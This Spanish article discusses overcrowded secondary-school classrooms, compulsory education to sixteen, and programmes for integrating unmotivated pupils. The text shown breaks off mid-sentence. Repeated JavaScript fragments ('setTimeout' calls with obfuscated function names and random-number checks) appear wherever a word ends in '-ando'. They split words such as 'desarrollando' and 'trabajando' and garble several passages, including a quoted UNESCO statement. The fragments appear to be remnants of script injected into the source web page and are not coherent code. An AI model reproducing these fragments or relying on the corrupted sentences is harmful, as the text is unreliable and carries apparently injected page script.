DILEMAS PRESENTES EN LA ENSEÑANZA SECUNDARIA Y PROPUESTA PRÁCTICA PARA LA MEJORA DE LA CONVIVENCIA Y EL CLIMA DE TRABAJO EN LOS CENTROS EDUCATIVOS.

Autora: Mª Teresa Vivas Martín

¿Qué entendemos por masificación en las aulas? ¿es un problema que debería tratarse en profundidad?. En este artículo veremos qué es eso de la masificación de aulas y cómo podríamos mejorarlo para así conseguir una mejor convivencia y un buen clima de trabajo que va a llevarnos a una mejora de la educación.

1. Introducción

De acuerdo con los datos presentados por el MEC puede ser un mero capricho el hecho de que los padres, alumnos y profesores protesten sobre el hecho de haber masificación en las aulas. Según los estudios realizados existen muchos alumnos matriculados en la enseñanza no universitaria pero la ratio es de 11,36 alumnos por docente. Pero el problema está que no todas las aulas cumplen estos resultados encontrándonos pues con 35 alumnos por aula e incluso 40 en algunas materias. Se pueden dar diferentes causas de dichas masificación:

ü  Un currículum educativo con demasiadas materias, más de las que necesita la escuela actual.

ü  La idea de que el alumno esté 35 horas en una clase no está relacionado con la idea de que van aprender más, de hecho, según el informe de la OCDE los países con mayor rendimiento académico son aquellos en los que los niños pasan un 20-25% menos de horas en clase.

ü  Existen materias impartidas para una minoría que además de un gasto económico supone no ser efectiva ya que el número ideal para que una clase funcione es de 12-21 alumnos. No es bueno la masificación en las aulas pero tampoco la minoría, por lo que debemos alcanzar un punto medio.

“A medida que los sistemas de educación se van desarrollandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando, tienen que enfrentarse con problemas más complejos y específicos. Deben afrontar el aumento del número de alumnos y la diversidad de la población escolar, tratandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando de conseguir al mismo tiempo que todos los niños y jóvenes, sea cual sea su medio social de procedencia, puedan tener acceso a una educación de calidad”, según explica Koichiro Matsuura, Director General de la Organización para la Educación, la Ciencia y la Cultura de las Naciones Unidas UNESCO en el “Informe de seguimiento de la Educación para todos en el mundo”, publicado en 2007 por la Organización de las Naciones Unidas.

Puede haber diferentes opiniones sobre si la educación se ha transformado en aulas masificadas o no, pero lo que está claro es que en tiempos pasados nos encontrábamos con aulas llenas de gente motivadas por aprender, no era obligatorio, y  lo hacían porque querían y no estaban obligados.

Ahora todos debemos recibir una educación hasta los 16 años a la vez que gratuita (Art.27 Constitución Española 1978).La inflexibilidad del sistema no permite otra alternativa hasta los dieciséis. Existen  fórmulas para poder llevar a cabo un aprendizaje adaptado a los diferentes grados de interés y o nivel de aprendizaje, pero puede ser posible que no sean suficientes o lo suficientemente eficaces.

Quizás uno de los principales problemas es la obligatoriedad hasta los dieciséis, ya que nos encontramos con pupilos que interrumpen el desarrollo del aprendizaje y al mismo tiempo los que verdaderamente quieren estudiar se sienten perjudicados. Estos alumnos son llamados “objetores estudiantiles” (Tomás García Muñoz.“Bocina del Apóstol”, nº1. Mayo 2001). Se puede dar el caso de que los estudiantes objetores se encuentren dentro de un contexto de “familias desestructuradas”, entonces estamos ante una situación en la que el entorno familiar influye negativamente en la educación de dicho individuo. Estos niños están carentes de  motivación, no muestran ningún tipo de interés  y no reciben ningún apoyo de la familia. Ligado a esto está le idea de que no todos los profesores saben afrontar este problema en las aulas y lo que quieren es sacar a este alumno del entorno educativo, en este caso del aula, ya que lo único que hace es perjudicar a todos.

El hecho de estar enseñandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando en una clase con un número de alumnos elevados nos lleva a trabajar con programas específicos que  hacen a que esos alumnos que no quieran estar seis horas sentados en un mismo pupitre tengan otra posibilidad de aprender. Con este tipo de programas se quiere conseguir la integración del alumno en el centro.

La idea de que la educación sea gratuita es algo en lo que la mayoría estamos de acuerdo. Todos los encuestados coinciden también en que la educación no puede hacer frente a la gran diversidad que nos encontramos actualmente  en una clase. Se debería ofrecer lo que mejor viene a cada uno, pero esto requiere como mínimo elevar el número de docentes en el centro ya que con el número de docentes que hay actualmente esto es inviable.

Esto se agrava con el hecho de pasar al instituto los cursos 1º y 2º de la ESO, ya no darán clase los diplomados en magisterio sino los licenciados en las diferentes especialidades pero entonces es obvio que se deberían ofertar más plazas para cubrir todas estas necesidades y hacer que la educación sea de más calidad. Teniendo en cuenta las ideas de los profesores, el problema está en que quizás no se estudie la idea de por qué tiene que estar un chico en un colegio si su motivación es otra y no la de estudiar. Todos coinciden en que la solución está en plantear nuevas salidas  antes de los dieciséis para que aquellos que no quieren estudiar tengan otras opciones que logren la integración en el centro.

En otros países como Alemania los niños desde los doce años pueden elegir qué quieren hacer y qué les gustaría ser. Quizás mucha gente piense que  es una edad muy temprana para que el niño decida, pero,  por otro lado deberíamos pensar que en este país la idea elegir desde pequeños sus propias preferencias está funcionandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando bastante bien ¿Por qué no en España?

Relación con el tipo de centro. Marco teórico.

Dependiendo del tipo de centro así se llevará a cabo las mejoras de los dilemas que en ellos puedan surgir. De esta manera es fundamental saber con qué tipo de  centro estamos trabajandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando. Nos encontramos con un centro más heterogéneo que homogéneo. La práctica de algunas actividades, por ejemplo cuestionarios o fichas, hechas en las horas de tutorías, nos lleva a la conclusión de que nos encontramos con un centro donde la multiculturalidad está presente día a día. La idea de multiculturalidad hace a los niños/as aprender a vivir en una sociedad donde todos somos iguales y donde el racismo no tiene cabida. Desde el punto de vista de la educación también estamos ante un centro heterogéneo ya que el hecho de tener un número elevado de niños/as en las aulas nos lleva a la implantación de actividades que hacen que la educación sea más personalizada.

Estamos hablandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando, pues, de actividades específicas por ejemplo en las tutorías o programas de diversificación, la masificación no deja otra alternativa que trabajar con programas específicos con los que se pretende no otra cosa que la integración del alumno en el centro.

Estos programas están pensados para niños con diferentes capacidades de aprendizaje, por ejemplo el programa CCPI está diseñado para trabajar con asignaturas de manipulación y esto hace que no todos los niños puedan acceder a este tipo de enseñanza, ya que se manejan utensilios peligrosos que no pueden estar al alcance de niños/as que por ejemplo tengan problemas psicológicos o de conducta.

Todos los que participan en este programa son aquellos que han intentado por todos los medios estudiar pero no han alcanzado el nivel establecido. El hecho de ser un centro heterogéneo nos dice que existen diferentes maneras de aprendizaje  y es ahora cu